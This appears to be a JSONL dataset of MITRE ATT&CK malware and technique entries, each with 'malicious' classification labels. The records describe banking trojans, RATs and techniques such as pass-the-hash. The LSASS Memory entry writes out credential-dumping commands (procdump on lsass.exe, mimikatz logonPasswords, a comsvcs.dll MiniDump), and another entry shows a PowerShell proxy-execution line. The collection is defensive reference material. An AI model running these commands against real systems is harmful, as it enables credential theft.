{"id": "mitre_00371", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Metamorfo\n\nType: malware\nPlatforms: Windows\n\n[Metamorfo](https://attack.mitre.org/software/S0455) is a Latin-American banking trojan operated by a Brazilian cybercrime group that has been active since at least April 2018. The group focuses on targeting banks and cryptocurrency services in Brazil and Mexico.(Citation: Medium Metamorfo Apr 2020)(Citation: ESET Casbaneiro Oct 2019) ", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Metamorfo", "malware_type": "malware"}}]}
{"id": "mitre_00372", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Patch System Image\n\nTechnique: T1601.001\nTactics: defense-evasion\nPlatforms: Network Devices\n\nAdversaries may modify the operating system of a network device to introduce new capabilities or weaken existing defenses.(Citation: Killing the myth of Cisco IOS rootkits) (Citation: Killing IOS diversity myth) (Citation: Cisco IOS Shellcode) (Citation: Cisco IOS Forensics Developments) (Citation: Juniper Netscreen of the Dead) Some network devices are built with a monolithic architecture, where the entire operating system and most of the functionality of the device is contained within a single file. Adversaries may change this file in storage, to be loaded in a future boot, or in memory during runtime.\n\nTo change the operating system in storage, the adversary will typically use the standard procedures available to device operators. This may involve downloading a new file via typical protocols used on network devices, such as TFTP, FTP, SCP, or a console connection. The original file may be overwritten, or a new file may be written alongside of it and the device reconfigured to boot to the compromised image.\n\nTo change the operating system in memory, the adversary typically can use one of two methods. In the first, the adversary would make use of native debug commands in the original, unaltered running operating system that allow them to directly modify the relevant memory addresses containing the running operating system. This method typically requires administrative level access to the device.\n\nIn the second method for changing the operating system in memory, the adversary would make use of the boot loader. The boot loader is the first piece of software that loads when the device starts that, in turn, will launch the operating system. Adversaries may use malicious code previously implanted in the boot loader, such as through the [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) method, to directly manipulate running operating system code in memory. This malicious code in the bootloader provides the capability of direct memory manipulation to the adversary, allowing them to patch the live operating system during runtime.\n\nBy modifying the instructions stored in the system image file, adversaries may either weaken existing defenses or provision new capabilities that the device did not have before. Examples of existing defenses that can be impeded include encryption, via [Weaken Encryption](https://attack.mitre.org/techniques/T1600), authentication, via [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004), and perimeter defenses, via [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599). Adding new capabilities for the adversary\u2019s purpose include [Keylogging](https://attack.mitre.org/techniques/T1056/001), [Multi-hop Proxy](https://attack.mitre.org/techniques/T1090/003), and [Port Knocking](https://attack.mitre.org/techniques/T1205/001).\n\nAdversaries may also compromise existing commands in the operating system to produce false output to mislead defenders. When this method is used in con", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1601.001", "technique_name": "Patch System Image", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00373", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Identify Business Tempo\n\nTechnique: T1591.003\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may gather information about the victim's business tempo that can be used during targeting. Information about an organization\u2019s business tempo may include a variety of details, including operational hours/days of the week. This information may also reveal times/dates of purchases and shipments of the victim\u2019s hardware and software resources.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about business tempo may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: ThreatPost Broadvoice Leak) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199))", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1591.003", "technique_name": "Identify Business Tempo", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00374", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Exploitation of Remote Services\n\nTechnique: T1210\nTactics: lateral-movement\nPlatforms: Linux, Windows, macOS, ESXi\n\nAdversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code.\u00a0A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\n\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\n\nThere are several well-known vulnerabilities that exist in common services such as SMB(Citation: CIS Multiple SMB Vulnerabilities) and RDP(Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL(Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169)(Citation: Ars Technica VMWare Code Execution Vulnerability 2021) Additionally, there have been a number of vulnerabilities in VMware vCenter installations, which may enable threat actors to move laterally from the compromised vCenter server to virtual machines or even to ESXi hypervisors.(Citation: Broadcom VMSA-2024-0019)\n\nDepending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1210", "technique_name": "Exploitation of Remote Services", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00375", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Internal Proxy\n\nTechnique: T1090.001\nTactics: command-and-control\nPlatforms: Linux, Network Devices, Windows, macOS, ESXi\n\nAdversaries may use an internal proxy to direct command and control traffic between two or more systems in a compromised environment. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use internal proxies to manage command and control communications inside a compromised environment, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between infected systems to avoid suspicion. Internal proxy connections may use common peer-to-peer (p2p) networking protocols, such as SMB, to better blend in with the environment.\n\nBy using a compromised internal system as a proxy, adversaries may conceal the true destination of C2 traffic while reducing the need for numerous connections to external systems.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1090.001", "technique_name": "Internal Proxy", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00376", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# ECCENTRICBANDWAGON\n\nType: malware\nPlatforms: Windows\n\n[ECCENTRICBANDWAGON](https://attack.mitre.org/software/S0593) is a remote access Trojan (RAT) used by North Korean cyber actors that was first identified in August 2020. It is a reconnaissance tool--with keylogging and screen capture functionality--used for information gathering on compromised systems.(Citation: CISA EB Aug 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "ECCENTRICBANDWAGON", "malware_type": "malware"}}]}
{"id": "mitre_00377", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Derusbi\n\nType: malware\nPlatforms: Windows, Linux\n\n[Derusbi](https://attack.mitre.org/software/S0021) is malware used by multiple Chinese APT groups.(Citation: Novetta-Axiom)(Citation: ThreatConnect Anthem) Both Windows and Linux variants have been observed.(Citation: Fidelis Turbo)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Derusbi", "malware_type": "malware"}}]}
{"id": "mitre_00378", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Mail Protocols\n\nTechnique: T1071.003\nTactics: command-and-control\nPlatforms: Linux, macOS, Network Devices, Windows\n\nAdversaries may communicate using application layer protocols associated with electronic mail delivery to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. \n\nProtocols such as SMTP/S, POP3/S, and IMAP that carry electronic mail may be very common in environments. Packets produced from these protocols may have many fields and headers in which data can be concealed. Data could also be concealed within the email messages themselves. An adversary may abuse these protocols to communicate with systems under their control within a victim network while also mimicking normal, expected traffic.(Citation: FireEye APT28) ", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1071.003", "technique_name": "Mail Protocols", "tactics": ["command-and-control"]}}]}
{"id": "mitre_00379", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# System Service Discovery\n\nTechnique: T1007\nTactics: discovery\nPlatforms: Linux, macOS, Windows\n\nAdversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start. Adversaries may also gather information about schedule tasks via commands such as `schtasks` on Windows or `crontab -l` on Linux and macOS.(Citation: Elastic Security Labs GOSAR 2024)(Citation: SentinelLabs macOS Malware 2021)(Citation: Splunk Linux Gormir 2024)(Citation: Aquasec Kinsing 2020)\n\nAdversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1007", "technique_name": "System Service Discovery", "tactics": ["discovery"]}}]}
{"id": "mitre_00380", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Windows Credential Editor\n\nType: tool\nPlatforms: Windows\n\n[Windows Credential Editor](https://attack.mitre.org/software/S0005) is a password dumping tool. (Citation: Amplia WCE)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Windows Credential Editor", "malware_type": "tool"}}]}
{"id": "mitre_00381", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Pass the Hash\n\nTechnique: T1075\nTactics: lateral-movement\nPlatforms: Windows\n\nPass the hash (PtH) is a method of authenticating as a user without having access to the user's cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash. In this technique, valid password hashes for the account being used are captured using a Credential Access technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems. \n\nWindows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes. (Citation: NSA Spotting)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1075", "technique_name": "Pass the Hash", "tactics": ["lateral-movement"]}}]}
{"id": "mitre_00382", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# WHOIS\n\nTechnique: T1596.002\nTactics: reconnaissance\nPlatforms: PRE\n\nAdversaries may search public WHOIS data for information about victims that can be used during targeting. WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet resources such as domain names. Anyone can query WHOIS servers for information about a registered domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)\n\nAdversaries may search WHOIS data to gather actionable information. Threat actors can use online resources or command-line utilities to pillage through WHOIS data for information about potential victims. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1596.002", "technique_name": "WHOIS", "tactics": ["reconnaissance"]}}]}
{"id": "mitre_00383", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# JSS Loader\n\nType: malware\nPlatforms: Windows\n\n[JSS Loader](https://attack.mitre.org/software/S0648) is Remote Access Trojan (RAT) with .NET and C++ variants that has been used by [FIN7](https://attack.mitre.org/groups/G0046) since at least 2020.(Citation: eSentire FIN7 July 2021)(Citation: CrowdStrike Carbon Spider August 2021)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "JSS Loader", "malware_type": "malware"}}]}
{"id": "mitre_00384", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# LSASS Memory\n\nTechnique: T1003.001\nTactics: credential-access\nPlatforms: Windows\n\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct [Lateral Movement](https://attack.mitre.org/tactics/TA0008) using [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550).\n\nAs well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.\n\nFor example, on the target host use procdump:\n\n* procdump -ma lsass.exe lsass_dump\n\nLocally, mimikatz can be run using:\n\n* sekurlsa::Minidump lsassdump.dmp\n* sekurlsa::logonPasswords\n\nBuilt-in Windows tools such as `comsvcs.dll` can also be used:\n\n* rundll32.exe C:\\Windows\\System32\\comsvcs.dll MiniDump PID lsass.dmp full(Citation: Volexity Exchange Marauder March 2021)(Citation: Symantec Attacks Against Government Sector)\n\nSimilar to [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012), the silent process exit mechanism can be abused to create a memory dump of `lsass.exe` through Windows Error Reporting (`WerFault.exe`).(Citation: Deep Instinct LSASS)\n\nWindows Security Support Provider (SSP) DLLs are loaded into LSASS process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\Security Packages and HKLM\\SYSTEM\\CurrentControlSet\\Control\\Lsa\\OSConfig\\Security Packages. An adversary may modify these Registry keys to add new SSPs, which will be loaded the next time the system boots, or when the AddSecurityPackage Windows API function is called.(Citation: Graeber 2014)\n\nThe following SSPs can be used to access credentials:\n\n* Msv: Interactive logons, batch logons, and service logons are done through the MSV authentication package.\n* Wdigest: The Digest Authentication protocol is designed for use with Hypertext Transfer Protocol (HTTP) and Simple Authentication Security Layer (SASL) exchanges.(Citation: TechNet Blogs Credential Protection)\n* Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.\n* CredSSP: Provides SSO and Network Level Authentication for Remote Desktop Services.(Citation: TechNet Blogs Credential Protection)\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1003.001", "technique_name": "LSASS Memory", "tactics": ["credential-access"]}}]}
{"id": "mitre_00385", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Code Repositories\n\nTechnique: T1213.003\nTactics: collection\nPlatforms: SaaS\n\nAdversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git.\n\nOnce adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or [Unsecured Credentials](https://attack.mitre.org/techniques/T1552) contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe)\n\n**Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1213.003", "technique_name": "Code Repositories", "tactics": ["collection"]}}]}
{"id": "mitre_00386", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Masquerading\n\nTechnique: T1036\nTactics: defense-evasion\nPlatforms: Containers, ESXi, Linux, macOS, Windows\n\nAdversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.\n\nRenaming abusable system utilities to evade security monitoring is also a form of [Masquerading](https://attack.mitre.org/techniques/T1036).(Citation: LOLBAS Main Site)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1036", "technique_name": "Masquerading", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00387", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Cobian RAT\n\nType: malware\nPlatforms: Windows\n\n[Cobian RAT](https://attack.mitre.org/software/S0338) is a backdoor, remote access tool that has been observed since 2016.(Citation: Zscaler Cobian Aug 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Cobian RAT", "malware_type": "malware"}}]}
{"id": "mitre_00388", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Linux Rabbit\n\nType: malware\nPlatforms: Linux\n\n[Linux Rabbit](https://attack.mitre.org/software/S0362) is malware that targeted Linux servers and IoT devices in a campaign lasting from August to October 2018. It shares code with another strain of malware known as Rabbot. The goal of the campaign was to install cryptocurrency miners onto the targeted servers and devices.(Citation: Anomali Linux Rabbit 2018)\n", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Linux Rabbit", "malware_type": "malware"}}]}
{"id": "mitre_00389", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Bandwidth Hijacking\n\nTechnique: T1496.002\nTactics: impact\nPlatforms: Linux, Windows, macOS, IaaS, Containers\n\nAdversaries may leverage the network bandwidth resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage in internet-wide scanning in order to identify additional targets for compromise.(Citation: Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential financial costs or availability disruptions, this technique may cause reputational damage if a victim\u2019s bandwidth is used for illegal activities.(Citation: Sysdig Proxyjacking)", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1496.002", "technique_name": "Bandwidth Hijacking", "tactics": ["impact"]}}]}
{"id": "mitre_00390", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Archive via Library\n\nTechnique: T1560.002\nTactics: collection\nPlatforms: Linux, macOS, Windows\n\nAn adversary may compress or encrypt data that is collected prior to exfiltration using 3rd party libraries. Many libraries exist that can archive data, including [Python](https://attack.mitre.org/techniques/T1059/006) rarfile (Citation: PyPI RAR), libzip (Citation: libzip), and zlib (Citation: Zlib Github). Most libraries include functionality to encrypt and/or compress data.\n\nSome archival libraries are preinstalled on systems, such as bzip2 on macOS and Linux, and zip on Windows. Note that the libraries are different from the utilities. The libraries can be linked against when compiling, while the utilities require spawning a subshell, or a similar execution mechanism.", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1560.002", "technique_name": "Archive via Library", "tactics": ["collection"]}}]}
{"id": "mitre_00391", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BOLDMOVE\n\nType: malware\nPlatforms: Linux, Network Devices\n\n[BOLDMOVE](https://attack.mitre.org/software/S1184) is a type of backdoor malware written in C linked to People\u2019s Republic of China operations from 2022 through 2023. [BOLDMOVE](https://attack.mitre.org/software/S1184) includes both Windows and Linux variants, with some Linux variants specifically designed for FortiGate Firewall devices. [BOLDMOVE](https://attack.mitre.org/software/S1184) is linked to zero-day exploitation of CVE-2022-42475 in FortiOSS SSL-VPNs.(Citation: Google Cloud BOLDMOVE 2023) The record for [BOLDMOVE](https://attack.mitre.org/software/S1184) only covers known Linux variants.", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BOLDMOVE", "malware_type": "malware"}}]}
{"id": "mitre_00392", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Pillowmint\n\nType: malware\nPlatforms: Windows\n\n[Pillowmint](https://attack.mitre.org/software/S0517) is a point-of-sale malware used by [FIN7](https://attack.mitre.org/groups/G0046) designed to capture credit card information.(Citation: Trustwave Pillowmint June 2020)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Pillowmint", "malware_type": "malware"}}]}
{"id": "mitre_00393", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Dridex\n\nType: malware\nPlatforms: Windows\n\n[Dridex](https://attack.mitre.org/software/S0384) is a prolific banking Trojan that first appeared in 2014. By December 2019, the US Treasury estimated [Dridex](https://attack.mitre.org/software/S0384) had infected computers in hundreds of banks and financial institutions in over 40 countries, leading to more than $100 million in theft. [Dridex](https://attack.mitre.org/software/S0384) was created from the source code of the Bugat banking Trojan (also known as Cridex).(Citation: Dell Dridex Oct 2015)(Citation: Kaspersky Dridex May 2017)(Citation: Treasury EvilCorp Dec 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Dridex", "malware_type": "malware"}}]}
{"id": "mitre_00394", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# KillDisk\n\nType: malware\nPlatforms: Linux, Windows\n\n[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "KillDisk", "malware_type": "malware"}}]}
{"id": "mitre_00395", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Gazer\n\nType: malware\nPlatforms: Windows\n\n[Gazer](https://attack.mitre.org/software/S0168) is a backdoor used by [Turla](https://attack.mitre.org/groups/G0010) since at least 2016. (Citation: ESET Gazer Aug 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "Gazer", "malware_type": "malware"}}]}
{"id": "mitre_00396", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NDiskMonitor\n\nType: malware\nPlatforms: Windows\n\n[NDiskMonitor](https://attack.mitre.org/software/S0272) is a custom backdoor written in .NET that appears to be unique to [Patchwork](https://attack.mitre.org/groups/G0040). (Citation: TrendMicro Patchwork Dec 2017)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NDiskMonitor", "malware_type": "malware"}}]}
{"id": "mitre_00397", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# WindTail\n\nType: malware\nPlatforms: macOS\n\n[WindTail](https://attack.mitre.org/software/S0466) is a macOS surveillance implant used by [Windshift](https://attack.mitre.org/groups/G0112). [WindTail](https://attack.mitre.org/software/S0466) shares code similarities with Hack Back aka KitM OSX.(Citation: SANS Windshift August 2018)(Citation: objective-see windtail1 dec 2018)(Citation: objective-see windtail2 jan 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "WindTail", "malware_type": "malware"}}]}
{"id": "mitre_00398", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# SyncAppvPublishingServer\n\nTechnique: T1216.002\nTactics: defense-evasion\nPlatforms: Windows\n\nAdversaries may abuse SyncAppvPublishingServer.vbs to proxy execution of malicious [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands. SyncAppvPublishingServer.vbs is a Visual Basic script associated with how Windows virtualizes applications (Microsoft Application Virtualization, or App-V).(Citation: 1 - appv) For example, Windows may render Win32 applications to users as virtual applications, allowing users to launch and interact with them as if they were installed locally.(Citation: 2 - appv)(Citation: 3 - appv)\n \nThe SyncAppvPublishingServer.vbs script is legitimate, may be signed by Microsoft, and is commonly executed from `\\System32` through the command line via `wscript.exe`.(Citation: 4 - appv)(Citation: 5 - appv)\n\nAdversaries may abuse SyncAppvPublishingServer.vbs to bypass [PowerShell](https://attack.mitre.org/techniques/T1059/001) execution restrictions and evade defensive counter measures by \"living off the land.\"(Citation: 6 - appv)(Citation: 4 - appv) Proxying execution may function as a trusted/signed alternative to directly invoking `powershell.exe`.(Citation: 7 - appv)\n\nFor example, [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands may be invoked using:(Citation: 5 - appv)\n\n`SyncAppvPublishingServer.vbs \"n; {PowerShell}\"`", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "medium", "compliance": [], "fields": {"technique_id": "T1216.002", "technique_name": "SyncAppvPublishingServer", "tactics": ["defense-evasion"]}}]}
{"id": "mitre_00399", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# NGLite\n\nType: malware\nPlatforms: Windows\n\n[NGLite](https://attack.mitre.org/software/S1106) is a backdoor Trojan that is only capable of running commands received through its C2 channel. While the capabilities are standard for a backdoor, NGLite uses a novel C2 channel that leverages a decentralized network based on the legitimate NKN to communicate between the backdoor and the actors.(Citation: NGLite Trojan)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "NGLite", "malware_type": "malware"}}]}
{"id": "mitre_00400", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CrossRAT\n\nType: malware\nPlatforms: Linux, Windows, macOS\n\n[CrossRAT](https://attack.mitre.org/software/S0235) is a cross platform RAT.", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CrossRAT", "malware_type": "malware"}}]}
{"id": "mitre_00401", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# BBK\n\nType: malware\nPlatforms: Windows\n\n[BBK](https://attack.mitre.org/software/S0470) is a downloader that has been used by [BRONZE BUTLER](https://attack.mitre.org/groups/G0060) since at least 2019.(Citation: Trend Micro Tick November 2019)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "BBK", "malware_type": "malware"}}]}
{"id": "mitre_00402", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# CozyCar\n\nType: malware\nPlatforms: Windows\n\n[CozyCar](https://attack.mitre.org/software/S0046) is malware that was used by [APT29](https://attack.mitre.org/groups/G0016) from 2010 to 2015. It is a modular malware platform, and its backdoor component can be instructed to download and execute a variety of modules with different functionality. (Citation: F-Secure The Dukes)", "findings": [{"category": "malicious", "subcategory": "malicious.malware", "severity": "critical", "compliance": [], "fields": {"malware_family": "CozyCar", "malware_type": "malware"}}]}
{"id": "mitre_00403", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Outlook Home Page\n\nTechnique: T1137.004\nTactics: persistence\nPlatforms: Windows, Office Suite\n\nAdversaries may abuse Microsoft Outlook's Home Page feature to obtain persistence on a compromised system. Outlook Home Page is a legacy feature used to customize the presentation of Outlook folders. This feature allows for an internal or external URL to be loaded and presented whenever a folder is opened. A malicious HTML page can be crafted that will execute code when loaded by Outlook Home Page.(Citation: SensePost Outlook Home Page)\n\nOnce malicious home pages have been added to the user\u2019s mailbox, they will be loaded when Outlook is started. Malicious Home Pages will execute when the right Outlook folder is loaded/reloaded.(Citation: SensePost Outlook Home Page)\n", "findings": [{"category": "malicious", "subcategory": "malicious.exploit", "severity": "critical", "compliance": [], "fields": {"technique_id": "T1137.004", "technique_name": "Outlook Home Page", "tactics": ["persistence"]}}]}
{"id": "mitre_00404", "source": "mitre_attack", "source_license": "Apache-2.0", "text": "# Digital Certificates\n\nTechnique: T1588.004\nTactics: resource-development\nPlatforms: PRE\n\nAdversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a 